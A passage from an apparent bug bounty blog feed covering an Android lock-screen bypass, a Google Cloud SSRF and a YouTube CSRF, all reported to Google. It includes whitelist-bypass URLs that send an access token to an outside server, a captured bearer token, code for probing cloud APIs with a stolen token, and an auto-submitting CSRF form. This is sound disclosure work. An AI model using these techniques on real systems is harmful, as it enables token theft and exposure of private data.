The next day I ended up explaining my situation to multiple people, and I even did a live demo with some of the Pixels inside Google’s office. That was an experience. We didn’t have a SIM ejection tool. First, we tried to use a needle, and somehow I managed to cut my finger in multiple places, and my hand started bleeding. I had a Google engineer put a band-aid on my finger. (Who else can say that??) Since the needle didn’t work, we started to ask around and one very kind woman gave us her earrings to try with. It worked! We swapped the SIMs and managed to, with some difficulty, unlock the devices. Now I felt better that people seemed to care about the issue.

Me in the London Google office the day after cutting my finger

I set a disclosure deadline of October 15, but the Android VRP team responded by saying that the bug would not be patched in October; they were aiming at December. This seemed way too far off for me, considering the impact. I decided to stick with my October deadline.

After talking to some Googlers about this October deadline, a member of the Android VRP team personally commented on the bug ticket, and asked me to set up a call to talk about the bug, and share feedback. We had a Meet call with multiple people, and they were very nice and listened to my whole story about being in the dark for months, only getting template responses (even for the $100k -> $0 duplicate), and overall feeling like I cared more about this bug than Google. They said that the fix was now planned to go out in November, not December. Still, my deadline was set to October.

Two weeks after our call, I got a new message that confirmed the original info I had. They said that even though my report was a duplicate, it was only because of my report that they started working on the fix. Due to this, they decided to make an exception, and reward $70,000 for the lock screen bypass. I also decided (even before the bounty) that I am too scared to actually put out the live bug and since the fix was less than a month away, it was not really worth it anyway. I decided to wait for the fix.

You can read the full conversation on feed.bugs.xdavidhu.me.

All in all, even though this bug started out as a not-too-great experience for me, the hacker, after I started “screaming” loudly enough, they noticed, and really wanted to correct what went wrong. Hopefully they treated the original reporter(s) fairly as well. In the end, I think Google did pretty well, although the fix timeline still felt long to me.

But I’ll let you be the judge of it.

Chapter 4:
What caused the bug?

Since Android is open source, the commit fixing this issue with all of the code changes is visible publicly:

Screenshot of the commit message

The first thing that surprised me when I first looked at this commit was the number of files changed. I previously thought that this bug would only have a simple one-liner fix, removing the incorrect line of code responsible for triggering an unlock. But it was not that simple:

Screenshot of the commit's changed files section

After reading the commit message and the code changes, I think I was able to get a rough picture of what happened under the hood. Keep in mind that I am not an Android engineer, so I want to keep this high level.

Seems like, on Android, there is a concept of a “security screen”. A security screen can be multiple things: the PIN entry screen, the fingerprint scanning screen, the password entry screen, or, in our case, the SIM PIN and SIM PUK entry screens.

These security screens can be stacked “on top” of each other. So for example when the phone was locked, and the SIM PIN entry was visible, it had a SIM PIN security screen on top of a “fingerprint security screen”.

When the SIM PUK was reset successfully, a .dismiss() function was called by the PUK resetting component on the “security screen stack”, causing the device to dismiss the current one and show the security screen that was “under” it in the stack. In our example that was the fingerprint security screen.

Since the .dismiss() function simply dismissed the current security screen, it was vulnerable to race conditions. What would have happened if something in the background had changed the current security screen before the PUK resetting component got to the .dismiss() call? Would the PUK component dismiss an unrelated security screen when it finally called .dismiss()?

This seems like exactly what happened. Some other part of the system was monitoring the state of the SIM in the background, and when it detected a change, it updated which security screen was currently active. It seems like this background component set the normal (e.g. fingerprint) screen as the active security screen, even before the PUK component was able to get to its own .dismiss() function call. By the time the PUK component called the .dismiss() function, it actually dismissed the fingerprint security screen, instead of just dismissing the PUK security screen, as it was originally intended. And calling .dismiss() on the fingerprint security screen caused the phone to unlock.

The Android engineers seemingly decided to refactor the .dismiss() function and made it require an additional parameter, where the caller can specify what type of security screen it wants to dismiss. In our case, the PUK component now explicitly calls .dismiss(SecurityMode.SimPuk), to only dismiss security screens with the type of SimPuk. If the currently active security screen is not a SimPuk screen (because maybe some background component changed it, like in our case), the dismiss function doesn’t do anything.

This seems to me like a pretty elegant and robust solution to defend against this, and future race conditions as well. I was not expecting to cause this big of a code change in Android with this bug.
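The mechanism is easy to model. Here is a minimal, hypothetical Python sketch of the security-screen stack described above (not the real AOSP code, just an illustration of the race and of the typed-dismiss fix):

```python
# Hypothetical model of the "security screen" stack -- NOT real
# Android code, just an illustration of the race described above.

class SecurityScreenStack:
    def __init__(self, screens):
        self.screens = list(screens)  # top of stack = last element

    def dismiss(self):
        # Pre-fix behavior: blindly dismiss whatever is on top.
        return self.screens.pop()

    def dismiss_typed(self, expected):
        # Post-fix behavior: only dismiss the top screen if it is of
        # the type the caller actually intended to dismiss.
        if self.screens and self.screens[-1] == expected:
            return self.screens.pop()
        return None  # no-op: the stale call can no longer unlock

# Normal flow: the PUK screen sits on top of the fingerprint screen.
stack = SecurityScreenStack(["fingerprint", "sim_puk"])

# The race: a background SIM-state monitor swaps the active screen
# *before* the PUK component gets to its dismiss() call.
stack.screens.pop()          # background component removes "sim_puk"
dismissed = stack.dismiss()  # stale PUK call dismisses "fingerprint"
print(dismissed)             # fingerprint -> device unlocked!

# With the typed fix, the same stale call does nothing.
stack2 = SecurityScreenStack(["fingerprint"])
print(stack2.dismiss_typed("sim_puk"))  # None -- screen stays up
```

In the toy model, as in the real fix, the caller names the screen type it wants gone, so a racing background update can no longer turn a PUK dismissal into an unlock.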

Fixing the Unfixable: Story of a Google Cloud SSRF

31 December 2021 at 11:00

The post you are reading right now is the write-up I am nominating for the 2021 GCP VRP Prize. The deadline is Dec. 31, 2021. Yeah. While the bug itself might arguably be underwhelming for such a competition, what came after reporting the issue could be valuable for both us, the researchers, and the developers fixing the bugs we find. As always, you can find the raw, straight-to-the-point bug report this post is based on, at feed.bugs.xdavidhu.me.

If you’d rather watch than read, I have made a detailed, one and a half-hour long deep-dive YouTube video where I react to the screen recordings of myself finding and exploiting this bug:

Link to the YouTube video

Chapter 1:
the proxy

While looking for interesting Google APIs, preferably ones used internally by Google, I stumbled upon jobs.googleapis.com. At first sight, it seemed like some private API that could be used by Google to manage their own job listings. As it turned out, jobs.googleapis.com was a Google Cloud product that, among all of the other Cloud products, Google sells to customers. They call it the “Cloud Talent Solution” API. It is an API mainly for companies building job searching websites, helping them better search their available job listings. Google’s own careers.google.com seems to be built on something very similar to this API.

While I was trying to figure this out, I found the product page for this API. Every GCP product has its own product page. These pages give a summary of what the given product is for, showcase their key features, and sometimes they even give some interactive demos.

Interactive demos? 🤔

Yes. This was the demo on the “Cloud Talent Solution” product page:

Short screen recording of the Jobs API's interactive demo

It is showing the features of the jobs API by making some hardcoded job search requests in real-time. But how does it do it?

Looking at the HTTP requests the page was making, the demo was not loading data directly from the jobs API, but from a proxy on the domain cxl-services.appspot.com:

POST /proxy?url=https%3A%2F%2Fjobs.googleapis.com%2Fv4%2Fprojects%2F4808913407%2Ftenants%2F%0A++++++ff8c4578-8000-0000-0000-00011ea231ff%2Fjobs%3Asearch HTTP/1.1
Host: cxl-services.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Content-Type: application/json; charset=utf-8
Content-Length: 102
Connection: close

{"jobQuery":{"query":"bartendar","queryLanguageCode":"en"},"jobView":"JOB_VIEW_SMALL","maxPageSize":5}

It was a Google App Engine app (because of the .appspot.com ending) which somehow proxied these requests to the real jobs API, and returned the response. This was needed because normally you’d need some kind of authentication to call the jobs API, which this proxy was adding onto the request before forwarding it:

Diagram showing cxl-services adding some kind of authentication to the request

You might wonder, why couldn’t they just hardcode some credentials for the API into the demo, and call jobs directly? Most probably this is for abuse protection since the cxl-services proxy this way can enforce rate limiting and other defenses. Providing the credentials, among other things, would allow someone to abuse them by calling the API without any limits.

With all of that said, how could we attack it? Let’s take a closer look at the URL:

https://cxl-services.appspot.com/proxy?url=https://jobs.googleapis.com/v4/projects/4808913407/tenants/ff8c4578-8000-0000-0000-00011ea231ff/jobs:search

The /proxy endpoint is expecting a url parameter, which in this case is the URL of the jobs API. This kind of behavior is a warning sign signaling that this service might be vulnerable to Server-side Request Forgery (SSRF). Essentially, SSRF happens when we as an attacker can make an application send out requests to any URL we specify. This bug is a great example of how a vulnerability like this can be exploited.

Let’s first try something simple. Can we really just proxy a request to any URL? I started a webserver on my $5 VPS, and set its URL as the url parameter to cxl-services:

Pointing the URL to my webserver

No, it’s not that easy. cxl-services employs some kind of whitelist, only allowing specific URLs to be proxied, like the jobs API.

Some additional boring details about cxl-services: It’s not just for the jobs API. As far as I know, all of the interactive product page demos proxy requests through cxl-services. Because of this, it allows proxying multiple different URLs. I have crossed paths with cxl-services before this research as well, but I wasn’t ever able to break the whitelist.

Let’s look at an example of which URLs are allowed and which are denied by cxl-services:

https://sfmnev.vps.xdavidhu.me/ - ❌
https://xdavid.googleapis.com/ - ❌
https://jobs.googleapis.com/ - ✅
https://jobs.googleapis.com/any/path - ✅
http://jobs.googleapis.com/any/path - ✅
https://jobs.googleapis.com:443/any/path - ✅
https://jobs.googleapis.comx:443/any/path - ❌
https://texttospeech.googleapis.com/xdavid - ✅ 

As you can see, if the hostname (domain name) of the URL is trusted, like jobs.googleapis.com, the proxy allows it no matter what the other parts of the URL are. This implies that cxl-services is doing some kind of dynamic URL parsing where it extracts the hostname of the URL, validates it with the allow list, and if all of that succeeds, proxies the request to the initially provided URL.
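Judging from that behavior, the whitelist check presumably looks something like this hostname-based validation (a speculative Python reconstruction reproducing the allow/deny table above, not Google’s actual code):

```python
from urllib.parse import urlsplit

# Speculative reconstruction of a hostname-based whitelist check,
# mirroring the observed allow/deny behavior. Not Google's code.

ALLOWED_HOSTS = {"jobs.googleapis.com", "texttospeech.googleapis.com"}

def is_allowed(url):
    # urlsplit parses RFC 3986-style: scheme, port, and path are
    # irrelevant to the check; only the extracted hostname matters.
    return urlsplit(url).hostname in ALLOWED_HOSTS

print(is_allowed("https://sfmnev.vps.xdavidhu.me/"))            # False
print(is_allowed("https://jobs.googleapis.com/any/path"))       # True
print(is_allowed("https://jobs.googleapis.com:443/any/path"))   # True
print(is_allowed("https://jobs.googleapis.comx:443/any/path"))  # False
```

A check like this looks airtight on its own; the trouble starts when a *different* parser later decides where the request actually goes.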

Speaking of warning signs, this is also one of them. Parsing a URL is hard.

Now the question is, can we trick the URL parser into thinking that the hostname is a whitelisted domain while making it send the request to a different host, like to our server? If both the whitelist validation logic and the request sending logic are parsing the attacker-provided URL separately, we might be able to exploit some slight differences in them.

After playing around with the /proxy endpoint by sending multiple requests trying to break the whitelist, I tried using the backslash-trick from my previous writeup titled “The unexpected Google wide domain check bypass”.

In short, the backslash-trick relies on exploiting a minor difference between two “URL” specifications: the WHATWG URL Standard, and RFC3986. RFC3986 is a generic, multi-purpose specification for the syntax of Uniform Resource Identifiers, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard.

Both of them describe a way of parsing URI/URLs, with one slight difference. The WHATWG specification describes one extra character, the \, which behaves just like /: ends the hostname & authority and starts the path of the URL.

The two specifications parsing the same URL differently
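You can reproduce the disagreement with Python’s standard library, whose urlsplit parses RFC 3986-style, against a quick-and-dirty WHATWG-style normalization (browsers treat \ in the authority like /):

```python
from urllib.parse import urlsplit

url = "https://sfmnev.vps.xdavidhu.me\\@jobs.googleapis.com/"

# RFC 3986-style parse: everything before the "@" is treated as the
# userinfo section, so the hostname looks trusted.
rfc_host = urlsplit(url).hostname
print(rfc_host)  # jobs.googleapis.com

# WHATWG-style parse: "\" in the authority acts like "/", ending the
# hostname early. A crude way to emulate it is to normalize the
# backslashes to slashes first, as browsers effectively do.
whatwg_host = urlsplit(url.replace("\\", "/")).hostname
print(whatwg_host)  # sfmnev.vps.xdavidhu.me
```

Two parsers, one URL, two different hosts: exactly the differential the backslash-trick exploits.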

So I tried using the backslash-trick on cxl-services as well, hoping that the whitelist validator and the actual request sending logic might parse the same URL differently:

request:

GET /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP/1.1
Host: cxl-services.appspot.com

response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
X-Cloud-Trace-Context: fa8cf39a9e7d74e14772efe215f180c1
Date: Mon, 23 Mar 2020 21:28:07 GMT
Server: Google Frontend
Content-Length: 35

Hello from xdavidhu's webserver! :)

It worked! cxl-services thought that the URL was trusted, sent a request to my webserver, and forwarded the response back to me. The whitelist validator of cxl-services most probably parsed the URL following the RFC 3986 rules and thought that everything before the @ was the userinfo section of the URL. After that, when the request was being sent, the HTTP library’s URL parser noticed that, because the \ in the WHATWG specification ends the hostname & authority, the host it needed to send the request to was sfmnev.vps.xdavidhu.me:

The two URL parsers in cxl-services parsing the exploit URL

And here comes the interesting part, what was in the request arriving at my webserver? As we already discussed, cxl-services had to somehow authenticate to the jobs API to be able to proxy the product page demo requests to it.

Setting my simple Python HTTPS server into --verbose mode, and making cxl-services request it once again allowed me to see the whole request going to my webserver, including all of the headers:

xdavid@scannr:~/webserver$ sudo httpsserver --verbose
[verbose] Verbose mode enabled.
[+] Starting server. URL: https://sfmnev.vps.xdavidhu.me/


[verbose]
('35.187.132.128', 44083)
[I] Reverse DNS failed. 

Host: sfmnev.vps.xdavidhu.me
content-type: application/json
authorization: Bearer ya29.c.KnT2B01b-kebLicHqMkilaSXkJCfy2R5EouzglkdlZUeBWRBW(GNaGILMgosUyDOSxSAp0AGTqC10692v_K6_B39nlezaV5ntV3MdJ-ZcipXA3zt1CpbgkANgNRFrshzCqzc9Vy_AimSdan8F-ZngZec081 
X-Cloud-Trace-Context: 5989e540147Sof691f39a0183161639/7393502370317147947
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Python-httplib2/0.14.0 (gzip) AppEngine-Google; (http://code.google.com/appengine; appid: s~cxl-services)
Accept-Encoding: gzip,deflate,br

35.187.132.128 - - [22/Mar/2021 17:23:29] code 404, message File not found
35.187.132.128 - - [22/Mar/2021 17:23:29] "GET /@jobs.googleapis.com/ HTTP/1.1" 404 -

Oh, there is something! cxl-services is setting the authorization header to an access token on every outgoing request to authenticate to the jobs and other APIs. Since we tricked the whitelist, now it also sent an access token to our malicious web server.

What can we use this access token for?

Chapter 2:
what did we steal?

The token that we stole was an OAuth 2.0 access token with the identity of (most probably) the cxl-services App Engine service account. With that token, we could call Google Cloud APIs in the name of, and with all of the privileges of cxl-services.

We might wonder, does this token/identity have access to some GCP resources (VMs, storage buckets, etc.) other than the jobs API? In the Amazon AWS universe, we would have a much easier time here. Unfortunately, in Google Cloud, you can’t ask the question “what do I have access to?”. You can only go to resources one-by-one, and ask “do I have access to this?”. Dylan Ayrey and Allison Donovan have made an awesome talk about this behavior.

Because of this, the best I could do was to start “brute-forcing” and call different APIs with the stolen access token to see if I had access to any resources.
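Such probing boils down to attaching the stolen token to requests against the various REST APIs. A rough sketch of that pattern (the endpoints are real Google Cloud REST paths, but the token is a placeholder, and the requests are only built here, never sent):

```python
# Sketch of "do I have access to this?" probing with a bearer token.
# The token below is a fake placeholder; requests are built, not sent.
from urllib.request import Request

TOKEN = "ya29.c.EXAMPLE"  # placeholder, not a real access token

PROBES = [
    # Resource Manager: list projects the identity can see
    "https://cloudresourcemanager.googleapis.com/v1/projects",
    # Compute Engine: list VMs in a project found in the first step
    "https://compute.googleapis.com/compute/v1/projects/docai-demo/aggregated/instances",
    # Cloud Storage: list buckets of a project
    "https://storage.googleapis.com/storage/v1/b?project=cxl-services",
]

def build_probe(url):
    # Each probe is an authenticated GET; a 200 vs 403 response would
    # answer the per-resource "do I have access?" question.
    return Request(url, headers={"Authorization": f"Bearer {TOKEN}"})

reqs = [build_probe(u) for u in PROBES]
print(reqs[0].get_header("Authorization"))  # Bearer ya29.c.EXAMPLE
```

Actually sending these against someone else’s project without permission would cross the line mentioned below, so treat this purely as an illustration of the enumeration pattern.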

A warning: Be careful and document your actions if you decide on using stolen credentials. There is a line in bug bounties which we shouldn’t cross. I could have reported the issue as-is, but I wanted to look around to prove that getting access to this identity is indeed impactful. I asked for permission from the Google team before performing any data-modifying actions.

Calling the projects.list method of the Resource Manager API, I found 4 GCP projects that this identity had some level of access to:

  • docai-demo
  • cxl-services (where the proxy was running)
  • garage-staging
  • p-jobs

Listing the Compute Engine VMs, I found two machines on the docai-demo project. It looked like they were part of a Google Kubernetes Engine cluster:

  • gke-cluster-1-default-pool-af71d616-j454 (35.193.88.22)
  • gke-cluster-1-default-pool-af71d616-stj9 (35.223.244.119)

Looking at the cxl-services project, in which our target proxy was running, I found:

  • A Cloud Storage bucket called cxl-services.appspot.com, which had hourly log files of all of the requests the cxl-services App Engine app has ever received, since 2017-10-18 up until today! These files could have contained some sensitive data of users interacting with the product page demos.
  • Some interesting internal details such as file paths from Google’s internal code mono-repository, google3, by listing the versions of the App Engine app: google3/cloud/ux/services/services/proxy.py
  • Another bucket called us.artifacts.cxl-services.appspot.com, used by App Engine, which included container images of the cxl-services proxy. These images could have been reversed to get access to the source code.

Last but not least, I wrote a very simple web application using Python and Flask, which returned a base64 encoded string saying POC by xdavidhu!. After some struggle & panicking, I managed to deploy this little application as a new App Engine service on cxl-services.appspot.com, demonstrating that I have full code execution access to the App Engine app. An RCE, if you will :)

This new service was invokable using the URL https://vrp-poc-dot-cxl-services.appspot.com/. After deploying the code, I opened it in a browser and saw:

My code executing on the cxl-services App Engine app

It was my code, running in an internal Google Cloud project’s App Engine app! At this point, I reported all of my findings and stopped exploring further. You can see more details of the exploitation and my weird reactions in the YouTube video I have previously mentioned.

The Google VRP panel rewarded this issue with a bounty of $3133.70 + a $1000 bonus for “the well written report and documenting lateral movement”.

Chapter 3:
bypassing the bypass

Since I had a 90-day public disclosure deadline on my report, a few days before the disclosure date I started preparing the feed post and the YouTube video. Looking at the issue report, I wanted to test the fix.

Google has indeed fixed the issue from the original report, in which I used the \@ characters to construct a URL that bypasses the whitelist, such as:

https://[your_domain]\@jobs.googleapis.com

But playing around with the parser for a few minutes and putting random characters in the URL, I found something.

If I put any character(s) in between the \ and the @, I was able to bypass the whitelist, once again:

https://sfmnev.vps.xdavidhu.me\anything@jobs.googleapis.com/
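Why does a `\` before the `@` fool the whitelist? Presumably because different URL parsers disagree about where the host ends. A quick sketch with Python's urllib (the validator-side view here is an assumption; the writeup doesn't name the exact parser involved):

```python
from urllib.parse import urlsplit

# Hypothetical bypass URL in the style above ("\\" is a single backslash):
url = "https://sfmnev.vps.xdavidhu.me\\anything@jobs.googleapis.com/"

# A urllib-style parser takes everything up to the last "@" as userinfo,
# so it sees the whitelisted host:
print(urlsplit(url).hostname)  # -> jobs.googleapis.com

# A WHATWG-style parser (what browsers implement) treats "\" in the
# authority like "/", so for it the host ends at the backslash:
# host = sfmnev.vps.xdavidhu.me, path = /anything@jobs.googleapis.com/
```

If the validator and the HTTP client sit on different sides of that disagreement, the request passes the whitelist but gets sent to the attacker's host.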

Finding this was literally just a few minutes of playing with the proxy, and it resulted in getting the original bug bounty reward amount, once again. It was quite insane. So, check your fixes!

(psst: on Google VRP, you don’t have to wait until your issue moves into fixed status. if you find that the code has changed, but you can still exploit it, write a comment on the original ticket and you might get another reward!)

Well, the story ends here, right? No. This story never ends.

After Google fixed the bypass and I disclosed the bug, I still had my YouTube video planned. I had hours of unedited screen recordings on my computer. In April, I opened them up in Final Cut and started cutting them together.

In the recordings, when I listed the versions of the cxl-services App Engine app, there were multiple results, each of them indicating a specific version of the proxy:

The results of listing the App Engine app's versions

I remembered that in App Engine, using a specific URL we can invoke any version of any service we want:

https://VERSION-dot-SERVICE-dot-cxl-services.appspot.com

I thought that to fix the issue, the product team must have pushed out a new version to the default service (which was the proxy). But did they leave the old versions there? I tried calling the old b347699687-dev-gokulr version (which I got from the screen recording) of the default service, using the original \@ whitelist bypass:

https://b347699687-dev-gokulr-dot-default-dot-cxl-services.appspot.com/proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/

And indeed, it worked! My web server received a request with an access token in the authorization header. It was still exploitable! Even though the proxy version I called was old, it worked the same way. It still generated an access token, and most importantly, it didn’t have the original vulnerability patched yet.

Once again, the Google VRP panel rewarded this second bypass as well. So, check your fixes.. of your fixes!

Will you be the one to bypass it for the 3rd time and get $3133.70?

I Built a TV That Plays All of Your Private YouTube Videos

5 April 2021 at 11:00

In my previous two YouTube writeups, we were limited by having to know the victim’s private video IDs to do anything with them. Let’s be honest, that’s a bit hard to exploit in the real world. Thankfully, I found another bug that solves this problem once and for all. Allow me to present a real, one-click steal-all bug to you. This one actually kicks ass. At least I like to think that.

Prefer to read the raw technical report I’ve sent to Google instead of the story? You can find it here!

It all started years ago. We were at a friend’s place and were flying tiny little FPV drones. After draining all of the miniature drone batteries, I wanted to show them an old personal video from my YouTube account. They had a Smart TV. I opened the YouTube app on my phone, selected my private video, and it gave me the option to play it on the TV. I thought why not, let’s do that, so we watched my private video on the TV without problems. But this planted an idea in my head that stayed there for years. My question was very simple:

How the hell did the TV play my private video?

I was not signed into the TV. And only I can watch my private videos, right? Did it somehow log the TV into my account temporarily? But then could the TV access all of my other private videos as well? I hope not?

A few years later, in 2020, I crossed paths again with a fellow LG smart TV. I remembered my question about the private videos, and now as I was actively working on Google VRP and YouTube, I decided to investigate.

OK, so a good starting point would be to look inside the YouTube for Android TV App. That’s probably a huge and complex Android application that would take forever to reverse-engineer right? Wrong. Turns out, it’s just a website. Looking back, I was such a boomer to expect anything else. Nowadays even your toothbrush is running a WebView.

After looking into the decompiled APK, I found that it simply loads https://www.youtube.com/tv into some kind of weird WebView-like browser, which is called Cobalt. Fair enough, that’s good news. We can just open https://www.youtube.com/tv in the browser, and start testing. So I opened the page:

The YouTube TV page redirecting me back to the desktop site

But wait! I don’t want to be redirected! Show me YouTube TV!

There must be a way by which YouTube decides if I am a TV or not. After finding no other option, I thought it must check the User-Agent header, so I tried modifying it:

// change 'Firefox' to 'Cobalt' in the User-Agent
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0"
->
"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Cobalt/87.0"

Changing Firefox to Cobalt in the initial request worked, and the request returned the full YouTube TV app, instead of the “You are being directed to youtube.com” screen:

The YouTube TV page, loaded successfully in Firefox

Boom! Awesome, we are a TV now and can start testing!

This is where writing this blog post gets a bit difficult. The feature I used to test this has been fully removed from the desktop YouTube site after my bug report. (coincidence? 👀) At the time I didn’t really document my research with screenshots (lesson learned), so unfortunately I will have to rely on public pictures / my memory to tell you about this feature.

So I wanted to see how this “remote-control” works. At the time, you were able to control a TV via the desktop YouTube site as well (https://www.youtube.com/), even if you were on a different network than the TV. I used this for testing, but this is the feature that got removed. (From the UI.)

To link a TV, you would have to enter its TV code. So on my “TV”, I generated a TV code…

The YouTube TV "Link with TV code" settings page, showing the TV Code PIN

And entered that TV code in my other browser, on https://youtube.com/pair:

The old, now removed pairing page on the desktop YouTube site src: wikiHow

After linking a TV, if you opened a video, a little Play on TV icon appeared on the right side of the player which, when pressed, transferred the video onto the TV:

The old, "Play on TV" button on the desktop YouTube site src: www.technipages.com

And guess what, it even worked with private videos! I finally had all the tools to get to the bottom of this.

The internal API that provided this remote control capability was called Lounge API. The pairing process looked like this:

  1. The TV requests a screen_id from /pairing/generate_screen_id
  2. Using the screen_id, the TV again requests a lounge_token from /pairing/get_lounge_token_batch
  3. With the lounge_token, the TV requests a pairing PIN from /pairing/get_pairing_code
  4. The TV displays the pairing PIN

After this, the user has to enter the pairing PIN on their device. With the PIN, the user’s device calls /pairing/get_screen, and if the user entered a correct PIN, the Lounge API returns a lounge_token for the user as well. After this, the pairing is over. The user can now control the TV using the lounge_token it just obtained.
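To make the exchange above concrete, here is a toy, in-memory simulation of it (the endpoint names are from the writeup; the state storage and token formats are invented):

```python
import secrets

# Toy in-memory "Lounge API" state; stand-ins for server-side storage.
screens = {}        # screen_id -> lounge_token
pairing_codes = {}  # pairing PIN -> screen_id

def generate_screen_id():
    screen_id = secrets.token_hex(8)
    screens[screen_id] = None
    return screen_id

def get_lounge_token_batch(screen_id):
    screens[screen_id] = secrets.token_hex(16)
    return screens[screen_id]

def get_pairing_code(screen_id, lounge_token):
    assert screens[screen_id] == lounge_token
    pin = secrets.randbelow(10**9)  # the TV displays this to the user
    pairing_codes[pin] = screen_id
    return pin

def get_screen(pin):
    # The user's device trades the PIN for the same lounge_token,
    # after which it can send commands to that screen.
    screen_id = pairing_codes.pop(pin)
    return screens[screen_id]

# TV side:
screen_id = generate_screen_id()
tv_token = get_lounge_token_batch(screen_id)
pin = get_pairing_code(screen_id, tv_token)
# User side, after reading the PIN off the TV:
user_token = get_screen(pin)
assert user_token == tv_token  # both sides now share the lounge_token
```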

Interested in what the pairing process looks like on a local network, where you don’t have to enter a TV code? I tested it with a Samsung TV and here is what I found.

After starting the pairing process, the TV switches into a “polling” mode, which is quite a common thing at Google. Instead of WebSockets, Google usually uses these bind requests, which are basically HTTP requests that take very long if there are no new events, but return immediately if there are some. And the TV calls this /bind endpoint over and over.

This HTTP polling might seem weird to you, even if you are a web developer. Here is an example:

A diagram explaining how the Google-wide "bind" requests work

As you can see, the TV sends a request to the /bind endpoint, asking if there are any new events. Since there are no events at the moment, the Lounge API doesn’t respond yet and keeps the HTTP request waiting. For the TV, it looks like the request is still loading. But as soon as the user sends a new command request to the Lounge API, the API returns the HTTP request to the TV with the new event. After this, the TV sends the /bind request again and waits for new commands. This gives the “real-time remote control” feeling, but without WebSockets. (Of course, if there are no events at all, the /bind requests still return with an empty body after a while, to prevent the requests from timing out.)
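This bind-style long poll can be sketched in a few lines with a blocking queue (a toy model, not the real Lounge API):

```python
import queue
import threading

events = queue.Queue()

def bind(timeout=5.0):
    """One 'bind' round-trip: block until an event arrives, or return an
    empty list after `timeout` so the request doesn't time out."""
    try:
        return [events.get(timeout=timeout)]
    except queue.Empty:
        return []

def send_command(cmd):
    # The user's device posting a command; it unblocks a pending bind().
    events.put(cmd)

# Simulate a command arriving shortly after the TV starts waiting:
threading.Timer(0.1, send_command, args=({"videoId": "M7lc1UVf-VE"},)).start()
print(bind())  # the waiting "request" returns as soon as the event lands
```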

“But you still didn’t tell me how it plays the private videos!! I didn’t come here to read about WebSocket alternatives.” - You might be thinking. And you are right. Here it goes. Get ready for the epic answer to the mystery that kept me up at night for years:

It uses an extra video-specific token, called ctt.

Eh. Hope I didn’t hype that up too much.

So, when the user requests to play a private video, the event the TV receives from the /bind endpoint includes an extra ctt parameter next to the videoId. When playing the video, the TV then requests the raw video URL from the /get_video_info endpoint and includes the ctt token as a GET parameter named vtt (for some reason). Without the ctt token, the TV can’t watch the private video.

This ctt token only gives permission to watch that specific video, so my fear I mentioned at the start of the blog post (that the TV can access my other private videos) is not true. But if you find a bug that makes it possible, make sure to write a blog post about it!
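The TV's video-info request can be sketched like this (the get_video_info endpoint and the vtt parameter name are from the writeup; the host, the video_id parameter name, and the remaining parameters the real client sends are assumptions):

```python
from urllib.parse import urlencode

def video_info_url(video_id, ctt):
    # The ctt travels, confusingly, as a GET parameter named "vtt".
    query = urlencode({"video_id": video_id, "vtt": ctt})
    return f"https://www.youtube.com/get_video_info?{query}"

print(video_info_url("M7lc1UVf-VE", "SOME_CTT_TOKEN"))
```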

So, what’s the bug?

Now that you understand how this real-time remote control magic works, let’s see what the actual bug was.

While playing with this API, I was looking at the logs in Burp, my HTTP proxy of choice. More specifically I was looking for the one specific request that the browser made, which actually started playing the video on the TV. There were a bunch of requests, so it felt a little bit like finding the needle in the haystack, but eventually, I found the one that triggered the event. I was able to repeat it with Burp, and start the video manually over and over on the TV, just by sending one request.

It was a POST request to the /bind endpoint. It had a crazy number of parameters, 90% of which were not required for it to play the video on the TV.

While trying to make sense of this request and its insane number of parameters, I noticed that something was missing… I couldn’t find any CSRF tokens anywhere. Not in the GET parameters, not in the headers, nowhere.

(Are you unsure about what a Cross-Site Request Forgery attack looks like? Watch this video by PwnFunction before continuing!)

I thought “hmm, that’s weird. It has to have some CSRF protection. I’m probably just missing something”. I tried removing more and more unnecessary parameters, and it still played the video on the TV. At one point, the only long and unpredictable parameter in the request was the lounge_token, and it still played the video on the TV. Still, I thought I had to be missing something. So I made an HTML page with a simple form that made a POST request to the Lounge API to simulate a CSRF attack.

I opened my little demo CSRF POC page and clicked the “submit” button to send the form, and the video started playing on the TV! BOOM! At this point I finally accepted that this endpoint really doesn’t have any CSRF protection!
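A minimal auto-submitting page like that POC could look like this (built as a Python string here; the /bind path is from the writeup, but the full URL and the exact placement of the lounge_token and videoId parameters are assumptions — the real request had many more parameters):

```python
# Both values are placeholders; in the demo, the lounge_token was the one
# my own paired TV obtained during pairing.
LOUNGE_TOKEN = "TARGET_TV_LOUNGE_TOKEN"
VIDEO_ID = "SOME_VIDEO_ID"

poc_page = f"""<html><body>
<form id="csrf" method="POST"
      action="https://www.youtube.com/api/lounge/bc/bind?lounge_token={LOUNGE_TOKEN}">
  <input type="hidden" name="videoId" value="{VIDEO_ID}">
</form>
<script>document.getElementById("csrf").submit();</script>
</body></html>"""

print(poc_page)
```

Because the form submits cross-site with the victim's cookies attached, and the endpoint checked nothing beyond them, the command goes through.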

So the /bind endpoint doesn’t have CSRF protection. What does this mean?

It means that we can play videos in the name of the victim if she visits our website! We just need to specify the lounge_token in the POST request, and the ID of the video to play, and send the request in the name of the victim, from our malicious site.

Since we are making the play request in the name of the victim, if we specify a victim’s private video to play, the TV targeted by the lounge_token will receive a ctt token for it, which will give the TV access to the private video…

This is what the video playing request without any CSRF protection (and without all of its unnecessary parameters) looked like:

An image showing the CSRF vulnerable "bind" HTTP request

Don’t worry if you don’t know what some of these parameters mean. I don’t know either. And originally it had like 10x more of them.

“But wait! How do we know what TVs the victim used before? How do we get a lounge_token? This can’t be exploited, right?” - You might ask.

Actually, it can be exploited. What if I told you, that we can build our own TV?

Imagine this attack scenario: We “make our own TV”, get a lounge_token for it, and then make a request in the name of the victim to play the victim’s private video on our “TV”. After this, we poll the /bind endpoint with our “TV”, waiting for new play events, and when we get it, we will also get the ctt for the victim’s private video, so we can watch it! That’s not bad!

